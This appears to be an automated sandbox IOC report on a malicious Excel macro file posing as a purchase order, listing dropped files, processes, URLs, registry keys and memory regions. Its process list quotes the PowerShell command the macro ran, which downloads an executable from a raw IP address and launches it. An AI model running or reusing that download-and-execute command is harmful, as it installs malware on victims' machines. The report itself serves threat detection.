IOC Report

loading gif

Files

File Path
Type
Category
Malicious
purchase Order.xlsm
Microsoft Excel 2007+
initial sample
malicious
C:\Users\user\Desktop\purchase Order.xlsmm (copy)
Microsoft Excel 2007+
dropped
malicious
C:\Users\user\Desktop\~$purchase Order.xlsm
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B987DBE.png
PNG image data, 1064 x 513, 8-bit/color RGBA, non-interlaced
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C1EA73P0DJNYCFGDEJWJ.temp
data
dropped
clean
C:\Users\user\Desktop\AE430000
Microsoft Excel 2007+
dropped
clean
C:\Users\user\Desktop\AE430000:Zone.Identifier
ASCII text, with CRLF line terminators
modified
clean

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe
malicious
C:\Windows\explorer.exe
'C:\Windows\explorer.exe' C:\Users\Public\eVJOpc.exe
clean
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
clean

URLs

Name
IP
Malicious
http://212.192.2
unknown
malicious
http://212.192.241.75/sam/new3.e
unknown
malicious
http://212.192.241.75/sam/new3.exe
unknown
malicious
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
unknown
clean
http://www.windows.com/pctv.
unknown
clean
http://investor.msn.com
unknown
clean
http://www.msnbc.com/news/ticker.txt
unknown
clean
http://www.icra.org/vocabulary/.
unknown
clean
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
unknown
clean
http://212.192.241.75/sam/new3.exe-OutFile$env:public
unknown
clean
http://212.192.241.75/sam/new3.exeu
unknown
clean
http://investor.msn.com/
unknown
clean
http://212.192.241.75/sam/new3.exe1.0a.
unknown
clean
http://212.192.241.75/sam/new3.exePE
unknown
clean
http://www.%s.comPA
unknown
clean
http://windowsmedia.com/redir/services.asp?WMPFriendly=true
unknown
clean
http://www.hotmail.com/oe
unknown
clean
There are 7 hidden URLs, click here to show them.

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
&&+
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2F122
2F122
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
x*+
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\350AF
350AF
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
4
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4
0
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4
MRUListEx
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0
NodeSlot
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0
MRUListEx
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell
SniffedFolderType
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@C:\Windows\system32\NetworkExplorer.dll,-1
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@C:\Windows\system32\unregmp2.exe,-9925
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@C:\Windows\system32\ntshrui.dll,-103
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@C:\Windows\system32\ntshrui.dll,-5112
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}
Rev
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}
FFlags
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}
Vid
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}
Mode
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}
LogicalViewMode
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}
IconSize
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}
ColInfo
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}
Sort
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}
GroupView
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}
GroupByKey:FMTID
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}
GroupByKey:PID
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}
GroupByDirection
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0
0
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0\0
NodeSlot
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0\0
MRUListEx
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\Shell
SniffedFolderType
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
MRUListEx
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
NodeSlots
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}
FFlags
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0
MRUListEx
clean
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
NodeSlots
clean
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\Directory\OpenWithProgids
File Folder
clean
There are 56 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
230B000
stack
page read and write
clean
28A0000
unkown
page read and write
clean
3334000
unkown
page read and write
clean
36BF000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
48BF000
unkown
page read and write
clean
1B869000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
2B77000
heap private
page read and write
clean
4958000
unkown
page read and write
clean
12D91000
unkown
page read and write
clean
28A0000
unkown
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
208000
heap default
page read and write
clean
430000
unkown image
page readonly
clean
3683000
unkown
page read and write
clean
870000
unkown image
page readonly
clean
2650000
unkown
page read and write
clean
2780000
unkown
page read and write
clean
440000
heap private
page read and write
clean
330000
unkown
page read and write
clean
4882000
unkown
page read and write
clean
3D00000
unkown image
page readonly
clean
3B45000
unkown
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
36CF000
unkown
page read and write
clean
4EB0000
unkown
page read and write
clean
3FB000
heap default
page read and write
clean
2D8E000
stack
page read and write | page guard
clean
5370000
unkown
page read and write
clean
7FF001A0000
unkown
page execute and read and write
clean
258E000
stack
page read and write
clean
310B000
unkown
page read and write
clean
4FC0000
unkown
page read and write
clean
7FF001D0000
unkown
page read and write
clean
366E000
unkown
page read and write
clean
36D0000
unkown
page read and write
clean
237A000
unkown
page read and write
clean
26B7000
unkown
page read and write
clean
1ADF0000
unkown
page read and write
clean
D6000
unkown
page read and write
clean
2650000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
3DD6000
stack
page read and write
clean
5370000
unkown
page read and write
clean
1BE000
heap default
page read and write
clean
5370000
unkown
page read and write
clean
264E000
stack
page read and write
clean
276E000
stack
page read and write
clean
307B000
unkown
page read and write
clean
5B0000
unkown image
page readonly
clean
3A89000
unkown
page read and write
clean
28A0000
unkown
page read and write
clean
413000
heap default
page read and write
clean
10000
unkown image
page read and write
clean
5370000
unkown
page read and write
clean
3F82000
unkown
page read and write
clean
10000
unkown image
page read and write
clean
2B80000
unkown
page read and write
clean
11A000
unkown
page read and write
clean
2650000
unkown
page read and write
clean
7FFFFFB2000
unkown image
page readonly
clean
4907000
unkown
page read and write
clean
21FF000
stack
page read and write
clean
90000
unkown
page read and write
clean
120000
unkown
page read and write
clean
1CE0000
unkown image
page readonly
clean
3AB9000
unkown
page read and write
clean
36B6000
unkown
page read and write
clean
70000
unkown image
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
3A9D000
unkown
page read and write
clean
30DC000
unkown
page read and write
clean
3121000
unkown
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
1D70000
heap private
page execute and read and write
clean
2B74000
heap private
page read and write
clean
2776000
stack
page read and write
clean
3266000
unkown
page read and write
clean
4EB0000
unkown
page read and write
clean
2820000
unkown
page read and write
clean
7FF00050000
unkown
page read and write
clean
3F48000
unkown
page read and write
clean
536D000
stack
page read and write
clean
3977000
unkown image
page readonly
clean
3638000
unkown
page read and write
clean
180000
heap default
page read and write
clean
2280000
unkown
page read and write
clean
3061000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
3600000
unkown
page read and write
clean
32C0000
unkown
page read and write
clean
1E55000
heap private
page read and write
clean
36AC000
unkown
page read and write
clean
3AF4000
unkown
page read and write
clean
45A0000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
2B10000
unkown
page read and write
clean
3ABC000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
3C0000
unkown image
page readonly
clean
2660000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
2B59000
heap private
page read and write
clean
7FF0011A000
unkown
page execute and read and write
clean
220000
heap default
page read and write
clean
7FF00280000
unkown
page execute and read and write
clean
7FF00210000
unkown
page read and write
clean
7FFFFFB2000
unkown image
page readonly
clean
4EB0000
unkown
page read and write
clean
20000
unkown image
page read and write
clean
3634000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
7FFFFFC2000
unkown image
page readonly
clean
7FF00142000
unkown
page execute and read and write
clean
366E000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
366F000
unkown
page read and write
clean
2650000
unkown
page read and write
clean
366E000
unkown
page read and write
clean
2A00000
unkown
page read and write
clean
2300000
stack
page read and write
clean
5370000
unkown
page read and write
clean
4800000
unkown
page read and write
clean
30A4000
unkown
page read and write
clean
3AE4000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
29FE000
stack
page read and write
clean
29EF000
unkown
page read and write
clean
7EFE0000
unkown image
page readonly
clean
7FF00220000
unkown
page read and write
clean
7FF00270000
unkown
page execute and read and write
clean
2650000
unkown
page read and write
clean
334F000
unkown
page read and write
clean
3602000
unkown
page read and write
clean
20000
unkown image
page readonly
clean
3A73000
unkown
page read and write
clean
367D000
unkown
page read and write
clean
2D8F000
stack
page read and write
clean
60000
unkown image
page readonly
clean
D5000
unkown
page read and write | page guard
clean
5370000
unkown
page read and write
clean
1E8B000
heap private
page read and write
clean
2670000
unkown image
page readonly
clean
400000
heap default
page read and write
clean
28A0000
unkown
page read and write
clean
3B02000
unkown
page read and write
clean
3B3E000
unkown
page read and write
clean
36B0000
unkown
page read and write
clean
2380000
unkown image
page readonly
clean
4FC0000
unkown
page read and write
clean
45A0000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
E0000
unkown image
page read and write
clean
3642000
unkown
page read and write
clean
331000
unkown
page read and write
clean
3B2D000
unkown
page read and write
clean
3E5000
heap default
page read and write
clean
2650000
unkown
page read and write
clean
110000
unkown
page read and write
clean
2650000
unkown
page read and write
clean
12EA1000
unkown
page read and write
clean
2DC7000
unkown
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
2860000
stack
page read and write
clean
2260000
unkown
page read and write
clean
1B0000
heap private
page read and write
clean
17E000
heap default
page read and write
clean
2AAE000
stack
page read and write
clean
7FFFFFB2000
unkown image
page readonly
clean
3B13000
unkown
page read and write
clean
2FF7000
unkown
page read and write
clean
2830000
stack
page read and write
clean
1BBA0000
heap private
page read and write
clean
1B9B0000
unkown
page read and write
clean
1B81E000
unkown
page read and write
clean
3790000
unkown
page read and write
clean
3EC9000
unkown
page read and write
clean
3A8D000
unkown
page read and write
clean
2360000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
7FFFFF00000
unkown
page execute and read and write
clean
32B000
stack
page read and write
clean
3C40000
unkown
page execute and read and write
clean
374B000
heap private
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
1B4FD000
stack
page read and write
clean
5370000
unkown
page read and write
clean
2DEE000
unkown
page read and write
clean
3EF2000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
3EFB000
unkown
page read and write
clean
5C00000
unkown
page read and write
clean
3AC8000
unkown
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
300000
unkown image
page readonly
clean
28A0000
unkown
page read and write
clean
366E000
unkown
page read and write
clean
13042000
unkown
page read and write
clean
2DC4000
unkown
page read and write
clean
10000
unkown image
page read and write
clean
36A000
heap default
page read and write
clean
3055000
unkown
page read and write
clean
320000
heap private
page read and write
clean
2650000
unkown
page read and write
clean
1D00000
unkown
page read and write
clean
366000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
54F0000
heap private
page read and write
clean
7FF0004A000
unkown
page execute and read and write
clean
4EB0000
unkown
page read and write
clean
2A20000
unkown
page read and write
clean
28A0000
unkown
page read and write
clean
3710000
heap private
page read and write
clean
3249000
unkown
page read and write
clean
3E1E000
unkown
page read and write
clean
48BB000
unkown
page read and write
clean
373D000
unkown
page read and write
clean
28A0000
unkown
page read and write
clean
28A0000
unkown
page read and write
clean
36BC000
unkown
page read and write
clean
3EE1000
unkown
page read and write
clean
3225000
unkown
page read and write
clean
28B0000
unkown
page read and write
clean
2650000
unkown
page read and write
clean
2650000
unkown
page read and write
clean
2840000
stack
page read and write
clean
5370000
unkown
page read and write
clean
239A000
heap private
page execute and read and write
clean
5370000
unkown
page read and write
clean
2A36000
unkown
page read and write
clean
2280000
unkown image
page readonly
clean
2B30000
unkown
page read and write
clean
2FFA000
unkown
page read and write
clean
291F000
stack
page read and write
clean
368D000
unkown
page read and write
clean
2B55000
heap private
page read and write
clean
2B20000
unkown
page read and write
clean
28A0000
unkown
page read and write
clean
35B7000
unkown
page read and write
clean
2A00000
unkown
page read and write
clean
495000
unkown
page read and write
clean
34D0000
unkown
page read and write
clean
147000
heap default
page read and write
clean
3693000
unkown
page read and write
clean
12D95000
unkown
page read and write
clean
3696000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
1DEB000
heap private
page read and write
clean
3A67000
unkown
page read and write
clean
36A3000
unkown
page read and write
clean
5E0000
unkown image
page readonly
clean
1D20000
unkown
page read and write
clean
45A0000
unkown
page read and write
clean
1E50000
heap private
page read and write
clean
3E0E000
unkown
page read and write
clean
140000
heap default
page read and write
clean
340000
unkown
page read and write
clean
3AAF000
unkown
page read and write
clean
45A0000
unkown
page read and write
clean
7FFFFFB2000
unkown image
page readonly
clean
1A0000
unkown image
page readonly
clean
2B6000
unkown
page read and write
clean
3100000
unkown
page read and write
clean
1E40000
unkown image
page readonly
clean
1B860000
unkown
page read and write
clean
498A000
unkown
page read and write
clean
3124000
unkown
page read and write
clean
309B000
unkown
page read and write
clean
2650000
unkown
page read and write
clean
3F79000
unkown
page read and write
clean
3CB0000
unkown image
page readonly
clean
7FF00250000
unkown
page execute and read and write
clean
20000
unkown image
page readonly
clean
30BA000
unkown
page read and write
clean
7FF00110000
unkown
page read and write
clean
30A1000
unkown
page read and write
clean
1D91000
unkown
page read and write
clean
486000
unkown
page read and write
clean
550000
unkown image
page readonly
clean
5370000
unkown
page read and write
clean
28A0000
unkown
page read and write
clean
47D0000
unkown image
page read and write
clean
322A000
unkown
page read and write
clean
444000
heap private
page read and write
clean
5D0000
unkown image
page readonly
clean
45A0000
unkown
page read and write
clean
30000
unkown image
page readonly
clean
3725000
unkown
page read and write
clean
28B0000
unkown
page read and write
clean
3699000
unkown
page read and write
clean
30AF000
unkown
page read and write
clean
30D5000
unkown
page read and write
clean
1B4000
heap private
page read and write
clean
7FF001F0000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
4EB0000
unkown
page read and write
clean
1D51000
unkown
page read and write
clean
28A0000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
450000
unkown
page read and write
clean
1B50000
unkown image
page readonly
clean
2FED000
unkown
page read and write
clean
28B0000
unkown
page read and write
clean
7FF00100000
unkown
page read and write
clean
4009000
unkown
page read and write
clean
5C0000
unkown image
page readonly
clean
5370000
unkown
page read and write
clean
1B823000
unkown
page read and write
clean
30000
unkown image
page readonly
clean
36B6000
unkown
page read and write
clean
7FFFFFB2000
unkown image
page readonly
clean
3C90000
unkown
page read and write
clean
7FF00042000
unkown
page execute and read and write
clean
1C70000
unkown image
page readonly
clean
7FFFFFC2000
unkown image
page readonly
clean
7EFE0000
unkown image
page readonly
clean
436000
heap default
page read and write
clean
2650000
unkown
page read and write
clean
45A0000
unkown
page read and write
clean
3EAC000
unkown
page read and write
clean
28A0000
unkown
page read and write
clean
110000
unkown
page read and write
clean
3B17000
unkown
page read and write
clean
34C6000
unkown
page read and write
clean
3655000
unkown
page read and write
clean
24AD000
stack
page read and write
clean
408F000
stack
page read and write
clean
36AC000
unkown
page read and write
clean
28A0000
unkown
page read and write
clean
2650000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
1E0000
unkown image
page readonly
clean
3AED000
unkown
page read and write
clean
7FF00102000
unkown
page execute and read and write
clean
36A9000
unkown
page read and write
clean
3A78000
unkown
page read and write
clean
160000
unkown image
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
5370000
unkown
page read and write
clean
2650000
unkown
page read and write
clean
233E000
stack
page read and write
clean
1B838000
unkown
page read and write
clean
3C50000
unkown
page execute read
clean
358E000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
50D0000
unkown
page read and write
clean
45A0000
unkown
page read and write
clean
3F8D000
unkown
page read and write
clean
40000
unkown image
page readonly
clean
26D0000
unkown
page read and write
clean
36A6000
unkown
page read and write
clean
3F80000
unkown
page read and write
clean
3087000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
308B000
unkown
page read and write
clean
306A000
unkown
page read and write
clean
31F000
stack
page read and write
clean
12F01000
unkown
page read and write
clean
12FE0000
unkown
page read and write
clean
3A7D000
unkown
page read and write
clean
188000
heap default
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
3014000
unkown
page read and write
clean
30F3000
unkown
page read and write
clean
2370000
unkown
page read and write
clean
2790000
unkown
page read and write
clean
40000
unkown image
page readonly
clean
1C65000
heap private
page read and write
clean
3DE0000
unkown
page read and write
clean
1CE4000
heap private
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
150000
unkown image
page readonly
clean
5370000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
7FF0005C000
unkown
page execute and read and write
clean
30000
unkown image
page readonly
clean
2390000
heap private
page execute and read and write
clean
1B85E000
unkown
page read and write
clean
409B000
stack
page read and write
clean
5370000
unkown
page read and write
clean
7FF00230000
unkown
page execute and read and write
clean
2FD5000
unkown
page read and write
clean
2FD8000
unkown
page read and write
clean
2650000
unkown
page read and write
clean
28A0000
unkown
page read and write
clean
26E0000
unkown
page read and write
clean
30C8000
unkown
page read and write
clean
450000
unkown image
page readonly
clean
3654000
unkown
page read and write
clean
28A0000
unkown
page read and write
clean
280E000
stack
page read and write
clean
3680000
unkown
page read and write
clean
7FF001E0000
unkown
page execute and read and write
clean
311B000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
1D88000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
36C2000
unkown
page read and write
clean
22B0000
unkown image
page readonly
clean
28A0000
unkown
page read and write
clean
3AE9000
unkown
page read and write
clean
373A000
unkown
page read and write
clean
2812000
stack
page read and write
clean
5BFD000
stack
page read and write
clean
5370000
unkown
page read and write
clean
3624000
unkown
page read and write
clean
D0000
unkown image
page readonly
clean
4D80000
unkown
page read and write
clean
312D000
unkown
page read and write
clean
28A0000
unkown
page read and write
clean
30C4000
unkown
page read and write
clean
2B0000
unkown
page read and write
clean
1D71000
unkown
page read and write
clean
28EF000
stack
page read and write
clean
28A0000
unkown
page read and write
clean
3B4F000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
7FF00290000
unkown
page read and write
clean
5570000
unkown image
page readonly
clean
36B0000
unkown
page read and write
clean
7FF00190000
unkown
page execute and read and write
clean
28A0000
unkown
page read and write
clean
2B70000
heap private
page read and write
clean
3690000
unkown
page read and write
clean
2FCE000
unkown
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
32F6000
unkown
page read and write
clean
1C9B000
heap private
page read and write
clean
48CA000
unkown
page read and write
clean
51F0000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
3ACB000
unkown
page read and write
clean
3127000
unkown
page read and write
clean
1E30000
unkown image
page readonly
clean
3790000
unkown image
page readonly
clean
48A1000
unkown
page read and write
clean
28A0000
unkown
page read and write
clean
3D50000
unkown
page read and write
clean
4EB0000
unkown
page read and write
clean
1DB0000
heap private
page read and write
clean
4EB0000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
380000
unkown
page read and write
clean
1D61000
unkown
page read and write
clean
7FF001B0000
unkown
page read and write
clean
28A0000
unkown
page read and write
clean
7FFFFFB2000
unkown image
page readonly
clean
4E10000
unkown
page read and write
clean
3672000
unkown
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
3B21000
unkown
page read and write
clean
3655000
unkown
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
7EFE0000
unkown image
page readonly
clean
5370000
unkown
page read and write
clean
7FF00115000
unkown
page read and write
clean
23D0000
heap private
page execute and read and write
clean
7FF00180000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
7FFFFF10000
unkown
page execute and read and write
clean
280000
unkown
page read and write
clean
2A0000
unkown
page read and write
clean
28A0000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
3AA9000
unkown
page read and write
clean
7FF00240000
unkown
page read and write
clean
1D0000
unkown image
page readonly
clean
48DD000
unkown
page read and write
clean
2850000
stack
page read and write
clean
28A0000
unkown
page read and write
clean
25B000
heap default
page read and write
clean
2270000
unkown
page read and write
clean
12DBC000
unkown
page read and write
clean
26F0000
unkown
page read and write
clean
38E000
heap default
page read and write
clean
3B06000
unkown
page read and write
clean
301F000
unkown
page read and write
clean
19F000
heap default
page read and write
clean
7FF00200000
unkown
page execute and read and write
clean
100000
unkown
page read and write
clean
30D1000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
1BE000
heap default
page read and write
clean
1CE0000
heap private
page read and write
clean
357000
heap default
page read and write
clean
1B7F0000
unkown
page read and write
clean
1C60000
heap private
page read and write
clean
26A000
heap default
page read and write
clean
2FBC000
unkown
page read and write
clean
2650000
unkown
page read and write
clean
238F000
stack
page read and write
clean
40000
unkown image
page readonly
clean
2870000
unkown image
page read and write
clean
324000
heap private
page read and write
clean
5370000
unkown
page read and write
clean
6E0000
unkown image
page readonly
clean
3F8000
heap default
page read and write
clean
3AAC000
unkown
page read and write
clean
1BA6000
unkown
page read and write
clean
3AA6000
unkown
page read and write
clean
32AD000
unkown
page read and write
clean
3166000
unkown
page read and write
clean
4EB0000
unkown
page read and write
clean
3500000
unkown
page read and write
clean
3077000
unkown
page read and write
clean
32C7000
unkown
page read and write
clean
7FF00217000
unkown
page read and write
clean
1B70000
unkown
page read and write
clean
408000
heap default
page read and write
clean
6D0000
unkown image
page readonly
clean
7FF00052000
unkown
page execute and read and write
clean
367A000
unkown
page read and write
clean
28A0000
unkown
page read and write
clean
306E000
unkown
page read and write
clean
3AF9000
unkown
page read and write
clean
3107000
unkown
page read and write
clean
2A10000
unkown
page read and write
clean
180000
unkown image
page readonly
clean
28B0000
unkown
page read and write
clean
36D0000
unkown
page read and write
clean
224D000
unkown
page read and write
clean
3137000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
430000
unkown image
page readonly
clean
279000
unkown
page read and write
clean
24B0000
unkown image
page readonly
clean
2770000
stack
page read and write
clean
30B3000
unkown
page read and write
clean
3A6F000
unkown
page read and write
clean
28A0000
unkown
page read and write
clean
2FDB000
unkown
page read and write
clean
47F0000
unkown image
page read and write
clean
51EE000
stack
page read and write
clean
324D000
unkown
page read and write
clean
2FDE000
unkown
page read and write
clean
350000
heap default
page read and write
clean
7FF001C0000
unkown
page execute and read and write
clean
3664000
unkown
page read and write
clean
5370000
unkown
page read and write
clean
47E0000
unkown image
page read and write
clean
1ED0000
unkown image
page readonly
clean
